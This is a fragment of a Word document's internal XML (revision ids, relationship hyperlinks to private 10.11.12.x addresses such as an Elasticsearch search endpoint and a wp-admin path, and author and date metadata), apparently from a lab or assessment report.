    <w:rsid w:val="00ED2B52"/>
    <w:rsid w:val="00EE40C9"/>
    <w:rsid w:val="00EF36F3"/>
    <w:rsid w:val="00EF69A0"/>
    <w:rsid w:val="00F32BC7"/>
    <w:rsid w:val="00F32E7D"/>
    <w:rsid w:val="00F43012"/>
    <w:rsid w:val="00F756AA"/>
    <w:rsid w:val="00F934B8"/>
    <w:rsid w:val="00FA472F"/>
    <w:rsid w:val="00FD56EE"/>
    <w:rsid w:val="00FE659D"/>
    <w:rsid w:val="00FF5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8FF2F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{485EA1CD-0597-4A05-9AAE-8E98C7A90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CF3"/>
    <w:rPr>
      <w:lang w:val="en-US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9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49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9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9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9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9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9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9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9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9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49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9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9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9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9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9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9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9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9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9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9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9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9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49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9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9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9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9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05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5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2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://10.11.12.38:3826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hyperlink" Target="http://10.11.12.75:9200/catalog/_search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10.11.12.53/wp-admin" TargetMode="External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hyperlink" Target="mailto:root@10.11.12.13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5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://10.11.12.13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21</Pages>
  <Words>1858</Words>
  <Characters>10597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Ciobanu Serafim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ciobanu Serafim</cp:lastModifiedBy>
  <cp:revision>216</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-05T18:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-06T10:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>